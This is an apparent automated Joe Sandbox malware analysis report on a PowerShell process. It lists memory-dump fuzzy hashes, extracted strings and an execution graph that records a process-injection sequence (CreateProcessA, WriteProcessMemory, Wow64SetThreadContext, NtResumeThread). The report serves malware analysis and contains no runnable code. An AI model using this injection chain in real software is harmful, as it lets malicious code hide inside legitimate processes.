                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e0d881bcb96651541cf1ec90adefc730b4272f176fc854830e9d33ba27205dba
                                                            • Instruction ID: c7eba8970363ee670a6fd54a626e41f4e622fc6e50276c164e8cfedeadd1968a
                                                            • Opcode Fuzzy Hash: e0d881bcb96651541cf1ec90adefc730b4272f176fc854830e9d33ba27205dba
                                                            • Instruction Fuzzy Hash: 75D1F274A00219AFCB54CF98D584A9EFBF2FF88310F248159E805AB365C735ED95CB90
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 06f70547e8e56641dc518e3cbe88f27ba615cd9c4ad2d356dcd5339cf37f59b4
                                                            • Instruction ID: 3c96656148131ac80802944cfda789edf6af3e744bc7ff016fd98a4ede98e391
                                                            • Opcode Fuzzy Hash: 06f70547e8e56641dc518e3cbe88f27ba615cd9c4ad2d356dcd5339cf37f59b4
                                                            • Instruction Fuzzy Hash: 06A18CB4A002058FCB14CF9DC5949AABBF1FF89314B2485A9E915AB365C736FC51CFA0
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f1c721383c29c5afcfaeaeb12a74fd4b2ed7559bbf23d67b32894e7d180afb0
                                                            • Instruction ID: 0d37be9071e0afce55819227987f35cad32906ec55bbcc819f4ee9a21ff3ed54
                                                            • Opcode Fuzzy Hash: 1f1c721383c29c5afcfaeaeb12a74fd4b2ed7559bbf23d67b32894e7d180afb0
                                                            • Instruction Fuzzy Hash: 6F4138B4A005059FCB09CF98C5989AAFBB1FF88314B1585A9D815AB364C736FD60CFA0
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bac1b1764d4ff268117f0ed176ff3dd0782542b2b22189de0dee7df56a7c118b
                                                            • Instruction ID: c1187161dbfcbb0a821401ceb019967c5ce3d63f50801cbc4b5d77139955c267
                                                            • Opcode Fuzzy Hash: bac1b1764d4ff268117f0ed176ff3dd0782542b2b22189de0dee7df56a7c118b
                                                            • Instruction Fuzzy Hash: FA210374A002099FCB44CF99C4849AAFBB1FF48310B2485A9E909EB725C731FC51CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1699464421.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_72d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 25dd1c188e58d3b788fdcc84833e39a20127df838a495a7673ae8d2cea7cd356
                                                            • Instruction ID: 7996eac7cfcd1c9dd1266afd93a5215ff6cd0bfd7ecdbf01bffa314616b78d60
                                                            • Opcode Fuzzy Hash: 25dd1c188e58d3b788fdcc84833e39a20127df838a495a7673ae8d2cea7cd356
                                                            • Instruction Fuzzy Hash: 46012B311093109AE7304A26DD84767BF98DF45324F18C42AED484B156C27DDC45C6B1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1699464421.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_72d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ad03b0919a994309f8c19b907396d19db9255601d5e2bbc789b57887b18e645
                                                            • Instruction ID: 3bc06433b9ccf3a45c939aca43ade7a63acf2adde73e5c079e86ec0bcbff8bac
                                                            • Opcode Fuzzy Hash: 3ad03b0919a994309f8c19b907396d19db9255601d5e2bbc789b57887b18e645
                                                            • Instruction Fuzzy Hash: E9F0F072009350AEE7208E1ADDC4B63FFA8EF55334F18C45AED488F296C2799C44CAB0
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e9d95e22d6122ceeb66cf6b7e37f37703a41dfcd26536c79f5e9213093f2f5a8
                                                            • Instruction ID: 43d9cabee50dbd341cfe81b65dbefe5f56ee9a16f79da12bc296d8e0f9017c61
                                                            • Opcode Fuzzy Hash: e9d95e22d6122ceeb66cf6b7e37f37703a41dfcd26536c79f5e9213093f2f5a8
                                                            • Instruction Fuzzy Hash: A2E026B4E0520E9F8F48DFF995425BEFFF5AB48200F10896E9819E3350EA3456518FE5
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 95b254a34d9040855ffd12308c8380dc2ff6b19ed3e2e48664ab1e58fa692d0b
                                                            • Instruction ID: 1d0edd1a17c13791a048da224caaa7e18cf13405102a7a63ee4cd55144b2ce5c
                                                            • Opcode Fuzzy Hash: 95b254a34d9040855ffd12308c8380dc2ff6b19ed3e2e48664ab1e58fa692d0b
                                                            • Instruction Fuzzy Hash: 2EE026B4E0420E9F8F48DFF995425BEFBF5AB48200F10896E9819E3350E63456518FA5
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1b94c30189fec01990d588241eeee1ddfdbbcdaaad0be7d02e60141ef757bf4c
                                                            • Instruction ID: 0ae79858fc93b02b14000da3ac7c825775a403e1648fd43740eccbb7c9f78740
                                                            • Opcode Fuzzy Hash: 1b94c30189fec01990d588241eeee1ddfdbbcdaaad0be7d02e60141ef757bf4c
                                                            • Instruction Fuzzy Hash: 0CC012B0649345D7C2195AE590082A877A95B00241F080444D20661853D762E071C9B2
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7dc8d9c3cad9868176138b42ca7cf2667d5fb49342202d058d14bb1944515c4
                                                            • Instruction ID: be40929448aa892033d0d4f9b1aea01958a011e782415771becd73b78b330384
                                                            • Opcode Fuzzy Hash: c7dc8d9c3cad9868176138b42ca7cf2667d5fb49342202d058d14bb1944515c4
                                                            • Instruction Fuzzy Hash: 06B092A064A78896D32992F5A4097E57AAE1B40255F480485A34924C53AA67B4F0C6F6

                                                            Execution Graph

                                                            Execution Coverage:5.3%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:6.1%
                                                            Total number of Nodes:99
                                                            Total number of Limit Nodes:0
                                                            execution_graph 88999 6c101d8 89000 6c101ed 88999->89000 89001 6c10203 89000->89001 89003 6c106a3 89000->89003 89004 6c106bd 89003->89004 89008 6c11c68 89004->89008 89012 6c11c63 89004->89012 89009 6c11c7d 89008->89009 89016 6c11fd1 89009->89016 89013 6c11c7d 89012->89013 89015 6c11fd1 8 API calls 89013->89015 89014 6c107fe 89015->89014 89017 6c12022 89016->89017 89021 6c127c0 89017->89021 89033 6c127b3 89017->89033 89018 6c11d23 89022 6c127d5 89021->89022 89031 6c127f7 89022->89031 89045 6c139d0 89022->89045 89050 6c138cf 89022->89050 89055 6c12e3e 89022->89055 89060 6c13f7b 89022->89060 89065 6c1362b 89022->89065 89070 6c13d76 89022->89070 89075 6c12f10 89022->89075 89080 6c131a9 89022->89080 89085 6c134d1 89022->89085 89031->89018 89034 6c127d5 89033->89034 89035 6c127f7 89034->89035 89036 6c138cf 2 API calls 89034->89036 89037 6c134d1 2 API calls 89034->89037 89038 6c139d0 2 API calls 89034->89038 89039 6c12f10 2 API calls 89034->89039 89040 6c131a9 2 API calls 89034->89040 89041 6c1362b 2 API calls 89034->89041 89042 6c13d76 2 API calls 89034->89042 89043 6c13f7b 2 API calls 89034->89043 89044 6c12e3e 2 API calls 89034->89044 89035->89018 89036->89035 89037->89035 89038->89035 89039->89035 89040->89035 89041->89035 89042->89035 89043->89035 89044->89035 89046 6c13a92 89045->89046 89047 6c12c8d 89045->89047 89090 6c1f508 89046->89090 89094 6c1f500 89046->89094 89047->89031 89051 6c138de 89050->89051 89098 6c1ee90 89051->89098 89102 6c1ee8f 89051->89102 89052 6c12c8d 89052->89031 89056 6c12e4d 89055->89056 89106 6c1e5e9 89056->89106 89110 6c1e5f0 89056->89110 89057 6c12c8d 89057->89031 89061 6c13f93 89060->89061 89114 6c14498 89061->89114 89118 6c144a8 89061->89118 89062 6c13fab 89066 6c1363a 89065->89066 89068 6c1ee90 WriteProcessMemory 89066->89068 89069 6c1ee8f WriteProcessMemory 89066->89069 89067 6c136d3 89068->89067 89069->89067 89071 6c13d7c 89070->89071 89073 6c1ee90 WriteProcessMemory 89071->89073 89074 6c1ee8f WriteProcessMemory 89071->89074 89072 6c12c8d 89072->89031 89073->89072 89074->89072 89076 6c12f1f 89075->89076 89078 6c1e5f0 Wow64SetThreadContext 89076->89078 89079 6c1e5e9 Wow64SetThreadContext 89076->89079 89077 6c12f4b 89078->89077 89079->89077 89081 6c13ab8 89080->89081 89083 6c1f500 NtResumeThread 89081->89083 89084 6c1f508 NtResumeThread 89081->89084 89082 6c12c8d 89082->89031 89083->89082 89084->89082 89086 6c12e3d 89085->89086 89087 6c12c8d 89085->89087 89088 6c1e5f0 Wow64SetThreadContext 89086->89088 89089 6c1e5e9 Wow64SetThreadContext 89086->89089 89087->89031 89088->89087 89089->89087 89091 6c1f550 NtResumeThread 89090->89091 89093 6c1f585 89091->89093 89093->89047 89095 6c1f508 NtResumeThread 89094->89095 89097 6c1f585 89095->89097 89097->89047 89099 6c1eed8 WriteProcessMemory 89098->89099 89101 6c1ef2f 89099->89101 89101->89052 89103 6c1ee90 WriteProcessMemory 89102->89103 89105 6c1ef2f 89103->89105 89105->89052 89107 6c1e5f0 Wow64SetThreadContext 89106->89107 89109 6c1e67d 89107->89109 89109->89057 89111 6c1e635 Wow64SetThreadContext 89110->89111 89113 6c1e67d 89111->89113 89113->89057 89115 6c144bf 89114->89115 89116 6c144e1 89115->89116 89122 6c14cee 89115->89122 89116->89062 89119 6c144bf 89118->89119 89120 6c144e1 89119->89120 89121 6c14cee 2 API calls 89119->89121 89120->89062 89121->89120 89123 6c14cfd 89122->89123 89127 6c1de30 89123->89127 89131 6c1de2f 89123->89131 89128 6c1de94 CreateProcessA 89127->89128 89130 6c1e01c 89128->89130 89132 6c1de30 CreateProcessA 89131->89132 89134 6c1e01c 89132->89134
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-312445597
                                                            • Opcode ID: 20a8fcdba04a18adc102fe69267c3ab4afcb4a82023ab1c6565b62ad12ef1cc4
                                                            • Instruction ID: 9611c797277b9a32c1a9835e214adfac8434fb80ed7d7c301728fcadccba9728
                                                            • Opcode Fuzzy Hash: 20a8fcdba04a18adc102fe69267c3ab4afcb4a82023ab1c6565b62ad12ef1cc4
                                                            • Instruction Fuzzy Hash: 3BB22774A002288FDB54CFA8C884AADBBF6FF49700F1481A9E505AF3A5DB719C85CF51
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-2546334966
                                                            • Opcode ID: d6b4dcfdf9608bd2a038756fdab116a74bb6eecbffde1f7ef69654cfe40479f5
                                                            • Instruction ID: 64d48660d17f5cd2c0f222661b7c232ee37db4ca468cbff2bc594da59489d6c3
                                                            • Opcode Fuzzy Hash: d6b4dcfdf9608bd2a038756fdab116a74bb6eecbffde1f7ef69654cfe40479f5
                                                            • Instruction Fuzzy Hash: 4C22F774A00228CFDB64CFA4C984BA9B7B2FB49700F1480E9D509AB3A5EB319D85CF51
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PH^q
                                                            • API String ID: 0-2549759414
                                                            • Opcode ID: bc236b55f2ab012466668735ad33805376613bc78d4c843234377444b33117ec
                                                            • Instruction ID: ef1b1eb474fc9d9c61ca44ee3ecc69b1e24643e1bcf22327c29320032660d9ef
                                                            • Opcode Fuzzy Hash: bc236b55f2ab012466668735ad33805376613bc78d4c843234377444b33117ec
                                                            • Instruction Fuzzy Hash: 66E11B70E05218CFEB54DFAAC944B9DBBF2FB8A304F2081A9D409AB355DB745A84DF41
                                                            APIs
                                                            • NtResumeThread.NTDLL(?,?), ref: 06C1F576
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 09ff78836f02fdd642af2dbc18b9bea79156b3e172ce58f07662d67c62cb0292
                                                            • Instruction ID: 321a834a3494bd2e3c5306e3178d46f59969a868a12825053a607c70b8020fc0
                                                            • Opcode Fuzzy Hash: 09ff78836f02fdd642af2dbc18b9bea79156b3e172ce58f07662d67c62cb0292
                                                            • Instruction Fuzzy Hash: 5A2106B1D002188FCB20DFAAC48469EFBF4EF89320F24842ED459A7250CB74A945CFA5
                                                            APIs
                                                            • NtResumeThread.NTDLL(?,?), ref: 06C1F576
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 4d0aad93f4c4a3a02411a265ea9ded760712e5fea69336e00f431d81fe363fcc
                                                            • Instruction ID: 7c01faf511e106689334db289a4cf91b3392ace2f0838f414d8e645255599cab
                                                            • Opcode Fuzzy Hash: 4d0aad93f4c4a3a02411a265ea9ded760712e5fea69336e00f431d81fe363fcc
                                                            • Instruction Fuzzy Hash: D01114B1D002088FCB10DFAAC484B9EFBF4EF89320F14842ED459A7210CB78A944CFA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PH^q
                                                            • API String ID: 0-2549759414
                                                            • Opcode ID: c62aae2c8e8224b549e58e447bfe87b3849b75c636031182a2d9b43622d7d8c1
                                                            • Instruction ID: f8c50b17c752eb6b2c3b8aec587fe6dac40e21d7a1593d8262e6985db6af6061
                                                            • Opcode Fuzzy Hash: c62aae2c8e8224b549e58e447bfe87b3849b75c636031182a2d9b43622d7d8c1
                                                            • Instruction Fuzzy Hash: B0D12970E05218CFEB54DFAAC944B9DBBF2FB8A304F2081A9D409AB355DB745A84DF41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Te^q
                                                            • API String ID: 0-671973202
                                                            • Opcode ID: 6a10b3df5b93f8dc4b3d77c47598e89f8486e7a94b55296568e53395f14cc574
                                                            • Instruction ID: 1586078d3460f735f189ef028f4078e1016f5fe95ea1de2e8ef833c09af14803
                                                            • Opcode Fuzzy Hash: 6a10b3df5b93f8dc4b3d77c47598e89f8486e7a94b55296568e53395f14cc574
                                                            • Instruction Fuzzy Hash: F6A1E670E15218CFEB54DFAAC984BADBBF2FF89304F109169E409A7251DB709985CF50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Te^q
                                                            • API String ID: 0-671973202
                                                            • Opcode ID: a94a3fb9fbe05662c8f738f785d9ebf38678d589ac6d154c408a7e8a08f28dd8
                                                            • Instruction ID: 3a6d9c2ad3ee021f8590fc82a23c318e5c04388d432a30cc99123335a171654a
                                                            • Opcode Fuzzy Hash: a94a3fb9fbe05662c8f738f785d9ebf38678d589ac6d154c408a7e8a08f28dd8
                                                            • Instruction Fuzzy Hash: 3EB1F574E15208CFEB54DFA9C984B9DBBF2FF89304F2081A9E409A7251DB709A85CF50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 99eff26abc3853f564a68a24be61f440b50c6e38ef248db2b10222a046faabb7
                                                            • Instruction ID: 489c45ac745a1eacc997fb5551160ed20d9448d8a5dd65d3cad7fa27daed3668
                                                            • Opcode Fuzzy Hash: 99eff26abc3853f564a68a24be61f440b50c6e38ef248db2b10222a046faabb7
                                                            • Instruction Fuzzy Hash: 1F52B474A042288FDB64DF28CD84B9ABBB5FB89301F1081D9E90DA7355DB34AE85CF54
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f44da6a8355f5b9e05fe44332fde85d57e4f2809603210df9b19771e7f38146
                                                            • Instruction ID: afc44f84e86a2c0ddc69afa3b58816246d304d5e2df5cac0b50db3705152287c
                                                            • Opcode Fuzzy Hash: 5f44da6a8355f5b9e05fe44332fde85d57e4f2809603210df9b19771e7f38146
                                                            • Instruction Fuzzy Hash: B671D470D052188FEB54CFAAD944B9DBBF2AF89300F1081AAD409AB365DB355E85CF40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e19bacd9545895ce9291f69cc9998279bb244d74f15184db8aa34c7d0c1a0096
                                                            • Instruction ID: c23f70ce2c1f52c4c7484b2b7b65dfe5ea34ce2424b7c1f3a67e2e4de4c30bd9
                                                            • Opcode Fuzzy Hash: e19bacd9545895ce9291f69cc9998279bb244d74f15184db8aa34c7d0c1a0096
                                                            • Instruction Fuzzy Hash: D561C674D052288FEB64CF6AD9447DDBBF2AF89300F1081AAD409A7365DB755E85CF40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d251ad2d901fe36a6dde65fdc4457de30fef2c2cbca045a3afc3bd7fc8dc4fd5
                                                            • Instruction ID: 9929c65592405a6e4383f939178dcf17a07cb9dc41ae2fc628be990d1136290c
                                                            • Opcode Fuzzy Hash: d251ad2d901fe36a6dde65fdc4457de30fef2c2cbca045a3afc3bd7fc8dc4fd5
                                                            • Instruction Fuzzy Hash: 1F61A370D052288FEB64CFAAD944BDDBBF2AF89310F1081AAD409A7365DB755E85CF40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-4260405320
                                                            • Opcode ID: 0da44c701336978c12fa4a8b225a7482081bacf1fba3007ea17c01064728e1b7
                                                            • Instruction ID: 9626656db688df01e3079b19d45e01c9cc2646392e5079137e454a4627ee654f
                                                            • Opcode Fuzzy Hash: 0da44c701336978c12fa4a8b225a7482081bacf1fba3007ea17c01064728e1b7
                                                            • Instruction Fuzzy Hash: 3A52F7B1B0020ADFDF1A8F69D5446AABBF2AF85710F18847AD4058F2D5DB31DC46CBA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-2087719723
                                                            • Opcode ID: 107a646278694abb27dc90e28f19b07ecf91bf6fe2245c48fc4b94a361e256ca
                                                            • Instruction ID: 87abd1b7542687dbe3bca352ebcbfb367411bef8902f4b7630206c3c27120b2d
                                                            • Opcode Fuzzy Hash: 107a646278694abb27dc90e28f19b07ecf91bf6fe2245c48fc4b94a361e256ca
                                                            • Instruction Fuzzy Hash: 5B22FA71B2420ADFDF1A8F68D8447AA7BB2BF85710F14847AE8058F2D1DB31D946C7A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-1828690331
                                                            • Opcode ID: 21f21182217d1887a8bd59228724ae5b3b25e9f41630234cf2493eedaa94f08a
                                                            • Instruction ID: a9336523e0e7796e2b7c9ac08b2b27b6a64b22474e15eb618ad676b718f97069
                                                            • Opcode Fuzzy Hash: 21f21182217d1887a8bd59228724ae5b3b25e9f41630234cf2493eedaa94f08a
                                                            • Instruction Fuzzy Hash: 6CA2C1B4B00305DFCF25CB69D944A6ABBE6AFC6310F14847AD4059B395DB32E847CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-928407100
                                                            • Opcode ID: 1d354630ee65c3fa8eb619ed863b8f4be5805ff521661dd6ba50f04134906ac2
                                                            • Instruction ID: ea216ba929c3a055604ea6617f5f7de460f8ec471b73edccd78058ba4ed62960
                                                            • Opcode Fuzzy Hash: 1d354630ee65c3fa8eb619ed863b8f4be5805ff521661dd6ba50f04134906ac2
                                                            • Instruction Fuzzy Hash: 13726BF0B2434ACFC715CB39881266ABFA6AFA6210F1885AFD445CF257DA31C855C792
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                            • API String ID: 0-2378468523
                                                            • Opcode ID: 7049faec71f47aac715be5f74dea2c5063bda98c4e3f96384551716287e781dc
                                                            • Instruction ID: 8baaa9e37c713c5d97dfd8d72bf08a849c9b101be40298386709057a1c1cfbf2
                                                            • Opcode Fuzzy Hash: 7049faec71f47aac715be5f74dea2c5063bda98c4e3f96384551716287e781dc
                                                            • Instruction Fuzzy Hash: 20928EB4B043059FDB25CB68D944A6ABBB2BF85314F14C47AD4099F395CB32EC46CB91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2192 72c2d78-72c2d9d 2193 72c2f43-72c2f8a 2192->2193 2194 72c2da3-72c2da8 2192->2194 2200 72c30c8-72c30e8 2193->2200 2201 72c2f90-72c2f95 2193->2201 2195 72c2daa-72c2db0 2194->2195 2196 72c2dc0-72c2dcc 2194->2196 2198 72c2db4-72c2dbe 2195->2198 2199 72c2db2 2195->2199 2203 72c2ef0-72c2efa 2196->2203 2204 72c2dd2-72c2dd5 2196->2204 2198->2196 2199->2196 2221 72c30ea-72c3116 2200->2221 2222 72c3085-72c308e 2200->2222 2205 72c2fad-72c2fb1 2201->2205 2206 72c2f97-72c2f9d 2201->2206 2209 72c2efc-72c2f05 2203->2209 2210 72c2f08-72c2f0e 2203->2210 2204->2203 2208 72c2ddb-72c2de2 2204->2208 2213 72c307a-72c3084 2205->2213 2214 72c2fb7-72c2fb9 2205->2214 2211 72c2f9f 2206->2211 2212 72c2fa1-72c2fab 2206->2212 2208->2193 2216 72c2de8-72c2ded 2208->2216 2217 72c2f14-72c2f20 2210->2217 2218 72c2f10-72c2f12 2210->2218 2211->2205 2212->2205 2213->2222 2223 72c3091-72c3097 2213->2223 2219 72c2fc9 2214->2219 2220 72c2fbb-72c2fc7 2214->2220 2224 72c2def-72c2df5 2216->2224 2225 72c2e05-72c2e09 2216->2225 2227 72c2f22-72c2f40 2217->2227 2218->2227 2228 72c2fcb-72c2fcd 2219->2228 2220->2228 2249 72c3118 2221->2249 2250 72c311a-72c311c 2221->2250 2229 72c309d-72c30a9 2223->2229 2230 72c3099-72c309b 2223->2230 2231 72c2df9-72c2e03 2224->2231 2232 72c2df7 2224->2232 2225->2203 2236 72c2e0f-72c2e11 2225->2236 2228->2213 2234 72c2fd3-72c2feb 2228->2234 2237 72c30ab-72c30c5 2229->2237 2230->2237 2231->2225 2232->2225 2247 72c2fed-72c2ff3 2234->2247 2248 72c3005-72c3017 